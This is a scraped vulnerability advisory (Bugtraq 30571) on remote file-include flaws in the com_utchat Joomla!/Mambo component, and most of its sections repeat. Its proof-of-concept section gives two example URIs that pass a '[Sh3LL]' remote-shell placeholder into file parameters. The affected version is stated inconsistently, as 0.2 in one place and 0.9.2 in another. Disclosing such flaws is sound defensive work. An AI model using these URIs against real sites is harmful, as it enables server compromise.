com_utchat component Mambo and Joomla! Component Multiple Remote File Include Vulnerabilities
BID:30571
Info
com_utchat component Mambo and Joomla! Component Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 30571 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 06 2008 12:00AM |
| Updated: | Aug 27 2008 02:24AM |
| Credit: | by_casper41 |
| Vulnerable: |
Yann Sallou com_utchat 0.2 |
| Not Vulnerable: |
Yann Sallou com_utchat 1.0 |
Discussion
com_utchat component Mambo and Joomla! Component Multiple Remote File Include Vulnerabilities
The com_utchat component for Mambo and Joomla! is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues can allow an attacker to compromise the application and the underlying computer; other attacks are also possible.
These issues affect com_utchat 0.9.2; other versions may also be affected.
The com_utchat component for Mambo and Joomla! is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues can allow an attacker to compromise the application and the underlying computer; other attacks are also possible.
These issues affect com_utchat 0.9.2; other versions may also be affected.
Exploit / POC
com_utchat component Mambo and Joomla! Component Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=[Sh3LL]
http://www.example.com/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/SetupDecorator.php?aFile=[Sh3LL]
An attacker can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=[Sh3LL]
http://www.example.com/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/SetupDecorator.php?aFile=[Sh3LL]
Solution / Fix
com_utchat component Mambo and Joomla! Component Multiple Remote File Include Vulnerabilities
Solution:
Updates are available. Please see the references for more information.
Yann Sallou com_utchat 0.2
Solution:
Updates are available. Please see the references for more information.
Yann Sallou com_utchat 0.2
-
Yann Sallou com_utchat_1.0.tar.gz
http://www.joomlagora.org/index.php/Telecharger-document/4-utChat-0.9. 2.html
References
com_utchat component Mambo and Joomla! Component Multiple Remote File Include Vulnerabilities
References:
References:
- com_utchat Homepage (Yann Sallou)